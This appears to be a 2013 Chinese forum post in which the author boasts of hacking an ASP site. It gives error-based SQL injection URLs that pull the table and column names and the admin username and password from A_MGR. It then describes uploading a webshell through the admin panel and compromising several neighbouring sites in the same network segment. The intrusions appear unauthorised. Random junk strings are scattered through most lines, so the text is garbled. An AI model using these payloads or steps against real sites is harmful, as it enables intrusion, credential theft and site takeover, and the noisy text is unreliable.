发现一个注入点
4 x- G3 u7 ]; Thttp://www.xxx.com /Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389 c& V) E/ D5 p3 W) R) H3 k" m
- ^/ [' W6 Y; P5 _3 X
习惯性的加’having1=1--7 l ^8 f' \$ Q5 h
0 g$ K$ Q& H1 o) v
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’having 1=1—
& l: V: B+ A6 K! o! z6 {( X4 _9 S3 B3 K, g. _7 Z/ E: K
0/ Q& H2 K. W$ H$ p5 b `
, I: o$ t, K) x% }
爆出Diary_A.dl_Title(这时候很激动啊)
& f) Z9 P" s( R0 Y% |+ M4 E
0 D$ w1 m7 ?, j* ]那么继续( A4 x5 j/ y0 \: R
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’group by dl_Title having 1=1—! j4 _% k! O ]. x7 H3 b( `
" [( p; E& _1 s" N继续,一直爆下去
6 D1 f3 N7 g/ |, U0 @0 ?
6 `. r4 i. m' ], R1 `爆到几个字段和表段 但是没找到需要的管理用户的字段
1 f/ @3 e9 S/ x. r2 j0 F* O. K* I% C
, Y+ f+ h7 |8 d2 B' J" O1 e0 F蛋疼了 怎么办 然后去后台登陆页看源码- _+ V/ b( e; `3 [$ S
a2 y! k5 q4 A, T2 V
0
% Q2 H% K5 n* ~* N6 Y% ~- ^- F, M' I. `
Input name= “ADUID” @7 W5 M3 p( Z9 U& w( U* x
Input name= “ADPWD”/ n+ h0 D9 A& L, B. K# K
& I5 ^0 T! J" F! }$ J4 F! N( L
很幸运 找到了字段那就继续
5 ?6 h. _0 p2 D! J" l找到之后开始爆用户
7 X; U' s, J& P3 K: _3 v2 ihttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_UID from A_MGR)>0—/ p# F: p# d, @. D' J: L& M/ E
爆密码
8 r9 `6 r. N7 ?& Z, ^* C4 Jhttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_PWD from A_MGR)>0—, k& R) L4 T3 c% v9 D+ t; ^5 ?
测试了下 这个注入点只能爆到文章哪里的表 " } w' ]6 n9 h& W3 H; W, u0 d
' s" p1 R( D6 A2 @! c6 f头疼 继续 既然只能报道文章哪里的表去后台爆 不过后台字符限制了
3 z( m, M# L9 G# `+ B/ T0 M9 p( x/ I
又想到 用户登录哪里也可以的吧就去试试 果然 今天我很幸运吧 爆出来了
: i! n0 T6 z& W- ?
6 i7 {0 a7 E+ J& Z& J4730 `3 E# L. X. B: ?, _0 [3 M
0 N0 D' r# B1 _" n1 V
进后台
3 Z4 t K3 {' S3 r
" a& G+ J4 F! C( Z6 o: S' A% \4 M# {% Y; }1 `- j
发现几个上传点 有的地方不能上传 而且防止恶意代码
; H4 m7 t4 y7 F) C# D' V9 Y. ?7 A/ T1 @
没办法 各种百度各种找大牛 找到一只好像可以突破的马8 J, y# c; P: i* v$ T( [7 A
. O7 S( G/ j$ a; K6 c/ F h8 ?
9 y* W8 M7 U9 V& r在系统管理那里直接上传 不过没有显示地址
" ]4 u- w+ }1 s4 h
7 V" c X P1 {; k5 N再上传一次 抓包 搞定OK5 w* S* V5 N7 t3 L- c- l
$ S& k5 ?. {2 U8 j) \$ u$ a' ~5 d, E( c
K# x' ~9 R6 t1 X7 z1 P472+ {8 f) ^9 D: ?) H/ x6 l$ m
) J% M( S1 `3 r3 E& g晚上不行了 去睡觉。。。0 a# t! I( a* s: S
第二天刚起床 闲的没事做继续日站吧
! t4 Y1 X* R2 d- T$ ^7 A) p3 a( I6 G8 e) X; a
找个站 就把这个站的旁c扫了下
* I) J' K }9 @ e H5 O1 [: K1 ]5 s/ Z
发现c段也有一个购物站 ,然后还和这个站的模板差不多
4 V- B3 i: v) y% G( @; B( P. }
% ?- G2 a) X7 U. N6 h6 h就找到会员登录口测试
) D0 [% I& `" v4 J3 s* R0 H+ X, r
'and (select top 1 MGR_UID from A_MGR)>0—
2 B5 L2 I+ ^5 j5 |' X' L0 F9 q果断爆到了 这时候我很激动 通杀3 ?$ E7 m& L3 a0 O: p7 o
! O+ d+ o. g: r% e% e2 i$ z再次翻c段
: S/ i. {6 C0 ]7 Z B5 Z
1 K% U: t8 y, O7 J+ I翻出几个站 都成功拿下0 ?! ~) \0 f5 f1 a; l5 P4 c
' a# L9 u; F8 Z! j
/ a4 p5 P- Z4 y" ?$ {0 d0 L$ P. d8 ~/ @6 c0 v+ {# K+ E3 {
修复方案:7 z& w: \3 k0 ]0 i5 G Z7 _( T
他们比我专业
7 @ U7 L9 c& D' b; c1 F) I" y+ N$ W9 f9 U0 l
$ f7 x T- U- _5 e! ]' c. }& b! D4 y( |3 M+ Q8 _. S* o: I1 ~
|
发表于 2013-4-4 17:40:38
收藏
支持
反对